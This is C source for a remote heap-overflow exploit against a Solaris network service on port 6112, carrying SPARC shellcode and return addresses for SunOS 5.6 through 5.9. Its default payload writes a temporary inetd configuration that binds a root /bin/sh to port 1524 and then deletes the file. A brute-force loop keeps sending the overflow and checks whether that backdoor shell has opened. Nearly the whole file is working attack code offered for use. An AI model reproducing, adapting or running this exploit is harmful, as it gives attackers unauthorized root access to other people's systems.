/*
  Remote exploit for Solaris Napalm heap overflow - SPARC version

      By scut@hotmail.com,
 virtualcat@xfocus.net



*************** Private copy, __DO NOT__ distribute
************************

               TESO CONFIDENTIAL - SOURCE MATERIALS
  The contents of these coded instructions, statements and computer
  programs may not be disclosed to third parties, copied or
duplicated in
  any form, in whole or in part, without the prior written permission
of
  TESO Security. This includes especially the Bugtraq mailing list,
the
  www.hack.co.za website and any public exploit archive.

  (C) COPYRIGHT TESO Security, 2002
  All Rights Reserved

****************************************************************************


    This is unpublished proprietary source code of TESO Security.

    bug found by scut

  Tested on 2.6/7/8.


  tested against: SunOS 5.6
                  SunOS 5.7
                  SunOS 5.8
                  SunOS 5.9

*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>

#define  BUFF_LEN  8360
#define PORT    6112

#define NNOP    2048

extern char *optarg;

char NOP_bna[] = "\xa2\x1c\x40\x11\x20\xbf\xff\xff";
char NOP[] = "\xa2\x1c\x40\x11";

/* Working "ksh -c " shellcode for Napalm  */
char shellcode[]=
        "\x20\xbf\xff\xff"      // bn,a <shellcode-4>
        "\x20\xbf\xff\xff"      // bn,a <shellcode>
        "\x7f\xff\xff\xff"      // call <shellcode+4>
        "\x92\x03\xe0\x50"      // add  %o7, 0x50, %o1
        "\x90\x02\x60\x10"      // add  %o1, 0x10, %o0
        "\x20\xbf\xff\xff"      // bn,a
        "\xff\xff\xff\xff"      // Leave space for t_p
        "\xe0\x02\x3f\xf0"      // ld  [ %o0 + -16 ], %l0
        "\xa2\x80\x3f\xff"      // addcc  %g0, -1, %l1
        "\xa0\x24\x40\x10"      // sub  %l1, %l0, %l0
        "\xd0\x22\x3f\xf0"      // st  %o0, [ %o0 + -16 ]
        "\xc0\x22\x3f\xfb"      // clr  [ %o0 + -4 ]
        "\xa2\x02\x20\x09"      // add  %o0, 9, %l1
        "\xc0\x2c\x7f\xff"      // clrb  [ %l1 + -1 ]
        "\xe2\x23\x3f\xf4"      // st  %l1, [ %o0 + -12 ]
        "\xa2\x04\x60\x03"      // add  %l1, 3, %l1
        "\xc0\x2c\x7f\xff"      // clrb  [ %l1 + -1 ]
        "\xe2\x22\x3f\xf9"      // st  %l1, [ %o0 + -8 ]
        "\xa2\x04\x40\x10"      // add  %l1, %l0, %l1
        "\xc0\x2c\x7f\xff"      // clrb  [ %l1 + -1 ]
        "\x82\x10\x20\x0b"      // mov  0xb, %g1
        "\x91\xd0\x20\x08"      // ta  8
  "\xff\xff\xff\xff"    // Need to put negation of
the length of the 
cmd + 1 here
        "\x22\x22\x22\x22"
        "\x33\x33\x33\x33"
        "\x44\x44\x44\x44"
        "\x2f\x62\x69\x6e\x2f\x6b\x73\x68\x20\x2d\x63\x20";

typedef struct {
  unsigned int retAddr;  // shellcode's entry point
  unsigned int retLoc;  // location to be overwritten
  char desc[32];    // Description
} Magic;


#define NUM_PLATFORM 4
Magic sysMagic[NUM_PLATFORM] = {  { 0x0002c5e8, 0xffbef97c,
"Solaris 5.6"
},
          { 0x0002ca30, 0xffbefa4c, "Solaris 5.7" },
           { 0x0002cd15, 0xeffebaec, "Solaris 5.8" },
        { 0x0002ce50, 0xffefbaec, "Solaris 5.9"
},

        };

char dummyBlock[48];

char cmd[] =  "echo \"ingreslock stream tcp nowait root
/bin/sh sh 
-i\">/tmp/.x;"
    "/usr/sbin/inetd -s /tmp/.x;/bin/rm -f /tmp/.x";

void  usage(char* argv0)
{
  printf("usage: %s -h host (-t 0|1|2|3) (-d default)
(-?)\n", argv0);
}

void help(char* argv0)
{
  usage(argv0);
  printf("\twhere\n");
  printf("\t  h - Host name or ip\n");
  printf("\t  t - System id. default is Solaris 8\n");
  printf("\t\t\t0 SunOS 5.6 SPARC\n");
  printf("\t\t\t1 SunOS 5.7 SPARC\n");
  printf("\t\t\t2 SunOS 5.8 SPARC\n");
    printf("\t\t\t3 SunOS 5.9 SPARC\n");
  printf("\t  c - User supplied command(s) eg \"touch
/tmp/AAA\", \"rm 
/core;rm /tmp/AAA\", etc.\n");
  printf("\t      Default is openning a shell at port 1524
on the victim\n");
  printf("\t  o - +/- offset from the default overwritten
location\n");
  printf("\t  n - Number of hits\n");
  printf("\t      Default is 1\n");
  printf("\t      Negative or zero means 1024 hits\n");
  printf("\t      Address increasement is 4 - Increasing
from the default 
location or the given offset\n");
  printf("\t  a - Adjustment. Default is 0, if default
doesn't work, 4 should 
work \n");
  printf("\t  ? - This help\n\n");
  printf("\t  By scut@hotmail.com
 \n\n");
  printf("\t  Sett. 2002\n\n");
}

int main(int argc, char** argv)
{
  struct  sockaddr_in targetAddr;
  struct  hostent* host;
  char  buffer[BUFF_LEN+1];
  char*  cmdPtr = NULL;
  int  cmdLen = 0;
  int  shellCodeLen = 0;
  int  offset = 0;
  int  fire = 1;
  int  userCmd = 0;
  int  system = 0;
  int  adj = 0;
  char  ch;
  int  sockfd;
  int  bytes;
  int  i;

  int  port = PORT;
  char*  hostName = NULL;
  int  nHits = 1;
  unsigned int retLoc = 0;
  unsigned int retAddr = 0;

  cmdPtr = cmd;

  while((ch = getopt(argc, argv, "h:p:c:o:t:n:a:?")) != EOF)
  {
    switch(ch)
    {
      case 'h':
        hostName = optarg;
        break;
      case 'p':
        port = atoi(optarg);
        break;
      case 'c':
        cmdPtr = optarg;
        userCmd = 1;
        break;
      case 'o':
        offset = atoi(optarg);
        offset = ((offset % 4) == 0 ? offset
: offset + (4 - (offset % 4)));
        break;
      case 't':
        system = atoi(optarg);
        if(system < 0 || system > NUM_PLATFORM)
        {
          help(argv[0]);
          exit(0);
        }
        break;
      case 'n':
        nHits = atoi(optarg);
        if(nHits <= 0)
        {
          nHits = 1024;
        }
        break;
      case 'a':
        adj = atoi(optarg);
        adj = ((adj % 4) == 0 ? adj : adj + (4 - (adj % 4)));
        break;
      case '?':
        help(argv[0]);
        exit(0);
      default:
        usage(argv[0]);
        exit(0);
    }
  }

  if(hostName == NULL)
  {
    usage(argv[0]);
    exit(0);
  }

  host = gethostbyname(hostName);
  if (host == NULL)
  {
    perror("gethostbyname() failed");
    exit(0);
  }

  targetAddr.sin_addr = *(struct in_addr *)host->h_addr;
  targetAddr.sin_family = AF_INET;

  strcpy(buffer, "AAAAAAAAAA20942094XX");

  memset(buffer+20, 'A', BUFF_LEN-20);

        buffer[4096+20] = 0x00;
        buffer[4096+20+1] = 0x00;
        buffer[4096+20+2] = 0x20;
        buffer[4096+20+3] = 0x94;

  // The tricky bit
        buffer[4096+20+12] = 0x00;
        buffer[4096+20+12+1] = 0x00;
        buffer[4096+20+12+2] = 0x10;
        buffer[4096+20+12+3] = 0x50;

  for(i=0; i < NNOP; i+=8)
  {
    memcpy(&buffer[32+i], NOP_bna, 8);
  }

  memcpy(&buffer[32+NNOP-4], NOP, 4);

  for(i=0; i < strlen(shellcode); i++)
  {
    buffer[32+NNOP+i] = shellcode[i];
  }

  cmdLen = ~(strlen(cmdPtr)+1);

  buffer[32+NNOP+88] = (char) ((0xff000000 & cmdLen) >> 24);
  buffer[32+NNOP+88+1] = (char) ((0x00ff0000 & cmdLen)
>> 16);
  buffer[32+NNOP+88+2] = (char) ((0x0000ff00 & cmdLen) >> 8);
  buffer[32+NNOP+88+3] = (char) (0x0000000ff &cmdLen );

  shellCodeLen = strlen(shellcode);

  for(i=0; i < strlen(cmdPtr); i++)
  {
    buffer[32+NNOP+shellCodeLen+i] = *(cmdPtr+i);
  }

  memset(dummyBlock, 0xff, 48);

  // t_s
  dummyBlock[3] = 0xf8;

  retAddr = sysMagic[system].retAddr + NNOP/2 + adj;

  // t_p
  dummyBlock[8] = (char) ((0xff000000 & retAddr) >>
24);
  dummyBlock[9] = (char) ((0x00ff0000 & retAddr) >>
16);
  dummyBlock[10] = (char) ((0x0000ff00 & retAddr) >>
8);
        dummyBlock[11] = (char) (0x000000ff & retAddr);

  if(userCmd)
  {
    printf("Exploit: User
command=\"%s\"\n", cmdPtr);
  }
  else
  {
    printf("Exploit: Open a shell on %s at port 1524
as default.\n",
hostName);
  }

  i = 0;
  retLoc = sysMagic[system].retLoc + offset;

  while(fire)
  {
    // Check whether port 1524 is opening
    if(!userCmd)
    {
      sockfd = socket(AF_INET, SOCK_STREAM, 0);
      if (sockfd == -1)
      {
        perror("socket() failed\n");
        exit(0);
      }
      targetAddr.sin_port = htons(1524);
      if( (connect(sockfd, (struct sockaddr *) &targetAddr, 
sizeof(targetAddr))) == 0)
      {
        if(i == 0)
        {
          printf("%s port 1524 has
already oppened.\n", hostName);
        }
        else
        {
          printf("\n*** 'Open!
Open! ...', 'Sesame! Sesame! ...' - Succeeded!!!  
***\n");
          printf("host %s port
1524 has been opened. Telnet to 1524, be  
careful!\n", hostName);
        }
        fire = 0;
      }
      else
      {
        if(i != 0)
        {
          printf("### Failed. ###\n\n");
        }
      }
      close(sockfd);
    }

    if(i > ((nHits-1)*4))
    {
      fire = 0;
    }

    // Try to shoot
    if(fire)
    {
      sockfd = socket(AF_INET, SOCK_STREAM, 0);
      targetAddr.sin_port = htons(port);
      if (connect(sockfd, (struct sockaddr *) &targetAddr, 
sizeof(targetAddr)) == -1)
      {
        perror("couldn't connect to the server");
        exit(0);
      }

      // t_n
      dummyBlock[32] = (char) ((0xff000000 & retLoc) >> 24);
      dummyBlock[33] = (char) ((0x00ff0000 & retLoc) >> 16);
      dummyBlock[34] = (char) ((0x0000ff00 & retLoc) >> 8);
      dummyBlock[35] = (char) (0x000000ff & retLoc) ;

      memcpy(buffer+4096+20+12+4128+8+48, dummyBlock, 48);

      printf("================================ Hit %d 
================================\n", i/4+1);
      printf("Trying %s - %s SPARC, nHits=%d\n", hostName, 
sysMagic[system].desc, nHits);
      printf("Loc=0x%.8x Addr=0x%.8x
Offset=0x%x Adjusted Loc=0x%.8x\n", 
sysMagic[system].retLoc, sysMagic[system].retAddr, offset, retLoc);
      bytes = send(sockfd, buffer, BUFF_LEN, 0);
      close(sockfd);

      sleep(2);

      retLoc += 4;
      i += 4;
    }
  }
}
/* End of File */
</PRE></BODY></HTML>